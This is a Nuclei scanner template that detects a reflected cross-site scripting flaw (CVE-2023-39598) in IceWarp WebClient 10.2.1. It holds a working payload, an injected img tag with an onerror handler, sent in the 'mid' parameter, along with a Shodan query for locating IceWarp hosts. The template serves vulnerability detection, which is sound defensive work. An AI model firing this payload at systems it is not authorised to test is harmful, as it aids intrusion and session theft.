nuclei-templates/http/cves/2023/CVE-2023-39598.yaml

53 lines
2.0 KiB
YAML

id: CVE-2023-39598
info:
name: IceWarp Email Client - Cross Site Scripting
author: Imjust0
severity: medium
description: |
Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
reference:
- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
- https://nvd.nist.gov/vuln/detail/CVE-2023-39598
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
- https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-39598
cwe-id: CWE-79
epss-score: 0.02804
epss-percentile: 0.90411
cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: icewarp
product: webclient
shodan-query: title:"icewarp"
tags: cve2023,cve,xss,icewarp
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=confirm(document.domain)>"
- "icewarp"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022066106fdff2f39d233a879770a44bf0af51976d8bb7b252d0ad825648873aafeb0220572b45153d8d42366194b8954545bb1a4dd2b8ef74d94db80d96d63dd8a54da2:922c64590222798bb761d5b6d8e72950